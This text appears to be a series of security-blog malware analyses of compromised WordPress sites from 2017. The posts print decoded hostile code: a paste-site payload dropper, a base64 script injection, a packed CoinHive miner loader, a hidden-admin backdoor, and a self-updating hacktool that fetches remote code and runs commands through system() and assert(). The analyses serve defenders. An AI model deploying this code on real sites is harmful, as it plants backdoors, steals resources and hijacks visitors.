Backdoor using paste site to host payload

Over the last months, we’ve been talking a lot about new ways to decode complex malwares that involve the usual PHP functions like eval, create_function, preg_replace, assert, base64_decode, etc.


According to our latest reports “Backdoors are found in 72% of infected websites”, although we have hundreds of posts on backdoors and their effects,  today I want to discuss a few techniques that doesn't follow any obfuscation tricks like encrypted strings, concatenations, and typecasting. These unusual backdoors often look like legitimate code and can go unnoticed for most of the malware scanners available in the market.

During an incident response investigation, I detected an interesting backdoor that was small, simple and effective.

The backdoor content was uploaded the wp-content/themes/buildup/db.php file and looked like this:

<?phpif ( @copy('hxxps://paste[.]ee/r/3TwsC/0', 'db.php') ) {echo "Copy_success";}else{echo "Copy_failed";}?>

This small piece of code downloads the full malware from the hxxps://paste[.].ee  website (if you are not familiar with this site, it's like a Pastebin with SSL and less controls).

The downloaded code was obfuscated with a free tool, which is pretty common for malware developers, but we see good code using it too (note to devs, avoid using those free tools, they may be saving your code).

And here's the more "readable" code:

And, as you may see, we got ourselves a nice copy of FilesMan backdoor being downloaded by a file that may be overlooked by an untrained person.

In order to prevent the website from getting infected, we highly recommend implementing security measures like file integrity monitoring and a website application firewall. It is advisable to constantly monitor your logs for unexpected behavior.

Nov 30, 2017 by Bruno Zanelato

IPv6 address in malicious Javascript redirect

We recently came across a file that shows an interesting case with a Javascript malicious code injection in a website’s custom script file, though it’s not specific to any particular website software:


Infected filename: ./paginas/rodape.php

As this is just a malicious code injection, the filename can be just about anything with a legitimate file extension (i.e .php, .html, .htm, etc) on most web server configurations. The injection was found to just be added to the bottom of the file’s text and was within the normal HTML Javascript tags (<script></script>):

<script src='data:application/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoIiUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCUzYSUyZiUyZiU1YiUzYSUzYSU2NiU2NiU2NiU2NiUzYSUzMSUzMiU2NCU2MyUzYSU2MSUzNyUzMiUzMiU1ZCUyZiUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSIpKTs='>
</script>

This injection may not look that suspicious if not checked carefully as there are legitimate uses of base64 encoded data within Javascript applications, however a quick decoding of the base64 using base64_decode function in PHP, base64 -d command on Linux (Debian based), or the fastest way is to use one of the myriad of online decoder websites. Below is the result of decoding the base64 text from the above malicious code:

document.write(unescape("%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%5b%3a%3a%66%66%66%66%3a%31%32%64%63%3a%61%37%32%32%5d%2f%22%3e%3c%2f%73%63%72%69%70%74%3e"));

The base64 decoded text reveals another layer of text that is de-obfuscated through the unescape function, but it also reveals something that is suspicious: document.write(

 

The Javascript function document.write is often seen in malicious Javascript code injections as causes whatever is within the function’s parentheses to be written to the visitor’s browser page.

 

Now that we know that this code is trying to write something to the visitor’s browser, lets decode the URL encoded text that follows the unescape( text:

<script src="https://[::ffff:12dc:a722]/"></script>

This reveals the true nature of this obfuscated Javascript injection; the code exists to use the document.write function so it can force the visitor’s browser to load an external Javascript file and in this case it just so happens to be hosted on a IPv6 address. The result for the unsuspecting visitor is being redirect to the above IPv6 address which contains a website with Adobe Flash images and instructing the visitor to update their Adobe Flash through a popup dialog box:

If the visitor clicks anywhere on the website page itself then they are automatically redirected, again using Javascript hosted on the IPv6 address, to a hosted file that presumably contains malware. I was unable to confirm the file as it had been taken down at the time of testing, but it is quite easy for the malware distributor to just switch to using a different host for the malicious file that is downloaded to the visitor’s computer.

 

This is interesting because while IPv6 addresses have been in use for some time now, they still aren’t used very often for hosting an entirely malicious website and sending unsuspecting users there through malicious Javascript that is injected into compromised websites. We still primarily see domain names or the more known IPv4 which is what most people consider when they think of an IP address. Now might be a good time to learn a little more about IPv6 just so that you can recognize it and know that it operates similarly to IPv4 in that can be used as a URL.

If you are ever worried that a similar malicious Javascript injection may be on your website, then please try out our completely free, no account required website scanner: SiteCheck.

Nov 29, 2017 by Luke Leal

Fake jQuery and Google Analytics Hide Yet Another...

This is a quick posts about yet another quite massive attack that installs CoinHive JavaScript Monero miners on compromised websites. You might have already read our blog posts on how such attacks were first detected and how they escalated after that.

On Oct 30th, 2017 Microsoft Malware Protection Services tweeted about a new cryptocurrency miner on compromised sites.


The malicious code has a few of interesting features that help obfuscate its true nature:

1. use of a non-dotted decimal notation for the host name: 3104709642(which translates to 185 .14 .28 .10)

  1. quite a common trick of using jQuery name as a script name: hxxp://3104709642/lib/jquery-3.2.1.min.js?v=3.2.11 (the script actually loads the obfuscated version of the CoinHive library)

  2. use of Google Analytics related variable names (google_analytics, googleanalytics) instead of the suspicious miner, to make it look even more legit.

If you remove the layers of obfuscation, it's still a typical CoinHive mining script that uses the NPRak9QU4lFBSneFt23qEIChh5r0SZev site id for the miner.

We decided to search for compromised sites with this script, but it turned out that the screenshot provided by Microsoft was not version of the script injected to websites. It was an already decoded version of the malicious script. The original code looks like this

eval(function(p,​a,c,k,e,r){e=function(c)...skipped...document|google_analytics|function|var|type|text|javascript|5000|addScript|getElementsByTagName|body|appendChild|setTimeout|createElement|stats|11|3104709642|lib|jquery|onload|src|innerHTML|min|new|googleanalytics|Anonymous||NPRak9QU4lFBSneFt23qEIChh5r0SZev|start|http|window|js'​.split('|'),0,{​}))

A quick search on PublicWWW revealed 1833 infected websites (as of Nov 22, 2017). We checked quite a few of them - they were all WordPress sites. Moreover, all the infected sites also shared the "cloudflare.solutions" malware (now it loads a keylogger script) that we wrote about this April.

This is a typical WordPress infection and you can use our guide to clean it or have us do it for you.

Nov 24, 2017 by Denis Sinegubko

New wave of wp-vcd Malware

Recently we saw a new wave of a known malware that injects malicious WordPress admin users to vulnerable or compromised sites.


The malware, well analysed by Manuel D'Orso (here), was being injected on default WordPress themes that are not used by the infected site (twentyfifteen and twentysixteen mostly).

Back when we first detected this wp-vcd variant, it was injecting its code on "wp-includes/class.wp.php", this is an outdated strategy to avoid being detected by the unaware user; since nobody wants to delete WordPress core files and risk the site integrity. However, as security tools become more and more popular, this strategy fails. It's now pretty easy for any tool to detect modifications on core files. And, since theme files are changed constantly, they found a better place to hide it.

The injection, on most of the cases we found, was related to outdated software (plugins or themes). Which a simple update or using a WAF would prevent. Update: This malware is also pre-installed in "nulled" premium themes on certain download sites.

Code is pretty straightforward and doesn't hide its malicious intentions by encoding or obfuscation of functions...

<?phperror_reporting(0);if( !isset($_GET['go']) ){require $_SERVER['DOCUMENT_ROOT'].'/wp-load.php';$table_name = $wpdb->get_blog_prefix();$sample = 'a:1:{s:13:"administrator";b:1;}';if( isset($_GET['ok']) ) { echo '<!-- Silence is golden. -->';}if( isset($_GET['awu']) ) {$wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`,  `user_status`, `display_name`) VALUES ('100010010', '100010010', '$P$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.',   '100010010', 'te@ea.st', '', '2011/06/07 0:00 00:00:00', '', '0', '100010010');");$wpdb->query("INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (100010010, '100010010', '{$table_name}capabilities', '{$sample}');");$wpdb->query("INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '100010010', '{$table_name}user_level', '10');"); }if( isset($_GET['dwu']) ) { $wpdb->query("DELETE FROM $wpdb->users WHERE `ID` = 100010010");$wpdb->query("DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.`umeta_id` = 100010010");}if( isset($_GET['key']) ) { $options = get_option( EWPT_PLUGIN_SLUG ); cho '<center><h2>' . esc_attr( $options['user_name'] . ':' .  esc_attr( $options['api_key'])) . '<br>';  echo esc_html( envato_market()->get_option( 'token' ) ); echo '</center></h2>'; }  }

It is creating a new admin user named 100010010 which, as admin, can perform several malicious activities on the infected site.

If you found this code on your site and need help checking for any other possible malware, please contact us we'll be glad to help.

Nov 13, 2017 by Krasimir Konov

Attackers leveraging WP Maintenance plugin to deface websites

Recently, during a website investigation, we detected that attackers have been modifying the database structure of WP Maintenance plugin (which is a very popular wordpress plugin which adds a "down for maintenance" or coming soon page for your website) and inserting malicious code into wpmm_settings option to lead users to the harmful content.

The malware would change the plugin's database values to the defacement page like it follows:

The background:

"bg_custom";s:67:"https://www.website.com/wp-content/uploads/2017/07/anonymous.jpg";

And the message :

s:4:"text";
s:538:"<h2 class="pi-item pi-item-spacing pi-title">“When you’re stuck in a foreign country and don’t know the words for “reverse charges”
and you’re in some lonely skin joint in the middle of some poor slum and just had every last cent robbed from you and you call yourself a bodyguard then you know you’re a loser.\"</h2>
<p style="text-align: left"> </p>

Now, in order to "deface" the website, the attacker would only need to enable the maintenance page. No files were rewritten and inexperienced website owners may have some trouble figuring out what happened and how to fix.

It is worth to mention that the plugin is NOT vulnerable, the attackers were leveraging valid plugin functions instead of replacing the index.php file as usual.

The rendered code will result into something like this:

As website owners, we have to make sure our visitors have the best experience possible and won’t be at risk when accessing your website.

If you detected any unusual code or suspect of any unexpected behavior, we are here to help you get your website back on track.

Oct 25, 2017 by Bruno Zanelato

Books SEO Spam

We already discussed in our blog some cases where the attacker uploaded a full ready-to-use website in order to promote their products and services. This is a well-known SEO spam tactic, but this time we're going to cover what we found in a recent incident response process. A full library was injected into the victim's file structure, of course without the consent of the website owner.


First of all, it's worth mentioning that the affected website was running a very old and vulnerable WordPress version, allowing the attacker to easily exploit it and do his dirty work. This is a reminder to always keep your software updated to prevent infections (or reinfections) from happening to your website.

The attacker uploaded a directory, whose name was "libarry" (misspelled), into the website root. That folder contained all the files for the online library, which would look like this:

Another interesting thing to note is that they even used the victim's website name as the online library name to make it more legit (the website name was suppressed in the screenshot and in the code block below). This is possible because of the configuration settings located at ./libarry/setting.php:

<?PHP $sub_folder = "libarry"; $site_name = "<Website Original Name> Online Books Library 2015"; $site_title = "<Website Original Name> Read n Download Unlimited Books Online"; $site_desc = "<Website Original Name> Read or Download Unlimited Free Books online on PDF, eBooks or ePub"; $sub_category = "category"; $cat_slug = "hXXp://".$_SERVER["SERVER_NAME"]."/".$sub_folder."/".$sub_category."/";$domain = $_SERVER["SERVER_NAME"]."/".$sub_folder;$site = "hXXp://".$_SERVER["SERVER_NAME"]."/".$sub_folder; $domain1 = str_replace("www.", "", $domain); $domain2 = str_replace("http://", "", $domain1); $domainx = str_replace("https://", "", $domain2); $domain_title = date("m-Y"); $target_dir = "./cache/"; $exten_sitemap = ".tar.gz"; $button_home = 0;$button_dis1 = 0; $button_dis2 = 0; $button_dis3 = 0;$button_dis4 = 0; $button_dis5 = 0;$button_single = 0;$google_master_tools = "<meta name='google-site-verification' content='sRUXfZlQbLp7pHG9TN7IBMlw9NBbfAeLlsmM4sFn5ec' /> "; $counter1 = str_replace(" ","","10660384"); $counter2 = str_replace(" ","","0a38ffb6"); ?>

When clicking on a product, it would direct you from hXXp://site[.]com/libarry to hXXp://site[.]com/asset due to the .htaccess rules in the libarry directory:

Options +FollowSymLinksOptions +Indexes<IfModule mod_rewrite.c> RewriteEngine on RewriteBase /libarry/ RewriteRule ^category/(.)$ hXXp://site[.]com/asset/category/$1 RewriteRule ^(.)/(.)/(.)/(.).jpg$ hXXp://ecx[.]images-amazon[.]com/images/I/$1.jpg RewriteRule ^(.)/(.)/(.).download ./images/button/download.png RewriteRule ^(.)/(.)/(.).more ./images/button/more.png RewriteRule ^download/(.)$ ./button.php?id=#budal#$1 RewriteRule ^read-online/(.)$ ./button.php?id=#budal#$1 RewriteRule ^find/(.)$ ./search.php RewriteRule ^dmca-notice/?$ ./dmca.php?=$1 RewriteRule ^privacy-policy/?$ ./privacy.php?=$1 RewriteRule ^contact-us/?$ ./contact.php?=$1RewriteRule ^faqs/?$ ./faq.php?=$1 RewriteRule ^disclaimers/?$ ./disclaimer.php?=$1 RewriteRule ^(.)/(.)/(.)/(.).html$ hXXp://site[.]com/asset/ RewriteRule ^([^/.]+)/?.xml$ ./sitemaps.php?id=$1 [L] </IfModule> ErrorDocument 404 hXXp://site[.]com/libarry

In hXXp://site[.]com/asset it gets content from http://www.goodreads.com/genres and http://books.4shopings.com, displaying the books and categories from those websites.

This sort of attack can heavily affect your SEO, so make sure that both libarry and asset folders (in this case specifically) have been removed along with any backdoors on the website. If you need some professional assistance to remediate it, let us know.

Oct 16, 2017 by Fernando Barbosa

Simple self updating hacktool

While working on a compromised website, it's very common to encounter hacktools. Those are like the attackers' swiss knife, allowing them to perform several tasks such as: DoS attacks, execute server level exploits and even simple filemanagers.


Sometime though, we find some very clever ones, such as this one infecting a WordPress website. It was able to download updated malware content from the internet and spread it to a new file.

The original code was hiding inside a Theme file:

wp-content/themes/THEME_NAME/framework/admin/framework-updates.php

The file content was obfuscated, as usual. Here's a small portion of it:

>>> ${"x47x4cOx42Ax4cx53"}["xx70tx68x62x62ent"]="cx64x78";${"GLOx42x41Lx53"}["x73ex6fx70ch"]="x62x6bx61vx64ox6ee";${"x47x4cx4fx42Ax4cx53"}["x70x65xx6bx78x79"]="x6fx70x65x6e";

Once decoded, the real code can be separated into two sections.

The first part uses a .tmp ("temporary") file stored into WordPress' uploads directory and it is used to detect whether this server has been already compromised or not:

<?php
error_reporting(0);
ini_set("display_errors",0);
$string=__FILE__;
if(strtolower(substr(PHP_OS,0,3))=="win")
$os="win";
else
$os="nix";
if($os=="win"){
while((substr($string,-1)!="\"))
$string=substr_replace($string,"",-1);
$filename=$string."..\..x5c..\..x5cuploads\tmp.tmp";
}
else{
while((substr($string,-1)!="/"))
$string=substr_replace($string,"",-1);
$filename=$string."../../../../uploads/tmp.tmp";
}
if(file_exists($filename)){
}
else{
$from_set="sahifa511@".$_SERVER["SERVER_NAME"];
$to="themesrv1@commandandcontrol.infected";
$subject="Accepted";
$header="from: ".$from_set;
$message="Link : http://".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]."rn";
$message.="Path : ".__file__;
$sentmail=@mail($to,$subject,$message,$header);
if($sentmail==true){
$open=fopen($filename,"w");
}
else{
};
}
?>

The code prepares the file path, adapting accordingly to the server's OS. Once the file path is ready, it checks for its existence.

If the file already exists, then nothing happens (empty IF block above). Otherwise, the code notifies the attacker via email and writes the file to the disk, which acts as flag for future executions.

The second part the code shows the attack's potential:

<?
if(isset($_POST["oldmtsfeatures"])){
$file=file_get_contents("http://infected.dom/newfile");
$open=fopen(getcwd()."/wp-mail-sample.php","w");
$yes=fwrite($open,"<?php $file ?>");
if($yes){
echo"<br>done";
}
else
echo"SomethingWentWrong";
if(isset($_POST["elf"])){
$elf=$_POST["elf"];
switch($elf){
CASE 1:{
$file=file_get_contents("http://files.hackingtruth.org/raw/0.txt");
$open=fopen($string."themefile1.php","w");
$yes=fwrite($open,"<?php $file ?>");
echo"1 executed";
break;
}
CASE 2:{
$file=file_get_contents($_POST["addr"]);
$open=fopen($string.$_POST["filewithext"],"w");
$yes=fwrite($open,"$file");
echo"2 executed";
break;
}
CASE 3:{
$cdx=$_POST["cdx"];
$bkavdone='system';
$bkavdone($cdx);
break;
}
CASE 4:{
call_user_func_array("assert", array($_REQUEST["comnd"]));
break;
}
}
}
}
?>

If the attacker posts any content on a "oldmtsfeatures" key, the actual hacktool is executed, and the code is able to spread the infection:

It downloads malware from a remote site and saves it to another file inside the theme's folder: wp-mail-sample.php

The attacker will use the elf option to select what action the malware will perform.

Options 1 and 2 are yet another spreading tools, which downloads code from another URL, fixed or obtained via POST, and saves it as theme file. Again, the file name could be fixed (themefile1.php) or obtained via POST. Case 2 in particular is very clever, since the malware is able to overwrite itself, with an updated version of the hacktool.

Options 3 and 4 are the most destructive part of the code, since they perform Remote Code Execution. The attacker sends it command to be run via POST, and executes them using a regular system() call or via a more clever execution of PHP's assert() function.

Sep 26, 2017 by Pedro Peixoto